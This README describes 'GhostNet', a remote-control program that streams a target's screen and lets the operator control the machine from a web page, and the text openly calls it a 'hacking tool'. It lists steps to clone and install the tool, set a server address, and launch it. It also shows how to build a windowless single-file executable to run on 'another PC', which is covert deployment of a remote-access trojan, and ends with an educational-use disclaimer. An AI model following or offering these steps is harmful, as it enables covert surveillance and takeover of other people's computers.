"GhostNet" is a program that allows remote control of a computer.
It transmits the target's screen, enabling remote control from a web page.
To install burgle, follow these simple steps:
-
⬇️ Download:
- Download file.
- Use Git
git clone https://github.com/Quema100/GhostNet.git
-
📁 Install Moudules:
npm (or pnpm) i
with install python moudules. (Python Moudule List) -
⚒️ Fix Server Address:
-
js:
socket = new WebSocket('ws://your-server-address:${port}');
-
Python:
server = websockets.serve(controller.handle_connection, "your-server-address", 8765)
-
-
🏃♀️ Start GhostNet:
- start hacking tool:
python ./src/GhostNet.py
- start web server:
npm (or pnpm) start
- start hacking tool:
To run this program on another PC, follow these simple steps:
-
Install: install pyinstaller
- terminal
pip install pyinstaller
- terminal
-
Build:
- terminal
pyinstaller -w -F -n=GhostNet ./src/GhostNet.py
- terminal
Warning
This template is a tool developed strictly for educational and research purposes.
Improper use of this project may result in illegal outcomes, and the responsibility lies solely with the user.
The creator assumes no responsibility for any legal or ethical issues arising from the use of this template.